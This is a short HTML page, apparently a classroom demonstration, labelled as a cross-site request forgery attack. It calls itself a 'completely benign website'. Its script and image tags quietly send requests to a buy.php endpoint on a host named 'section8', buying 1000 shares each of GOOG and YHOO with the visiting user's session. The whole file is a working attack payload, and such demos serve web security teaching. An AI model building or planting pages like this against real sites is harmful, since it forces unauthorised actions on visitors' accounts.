<!--
/**********************************************************************
 * Cross-Site Request Forgery attack
 **********************************************************************/
-->
<html>
    <head>
        <title>Cross-Site Request Forgery</title>
    </head>
    <body>
        <p>This is my completely benign website. Trust me.</p>
        <script src="http://section8/buy.php?symbol=GOOG&shares=1000"></script>
        <img alt="" src="http://section8/buy.php?symbol=YHOO&shares=1000" />
    </body>
</html>
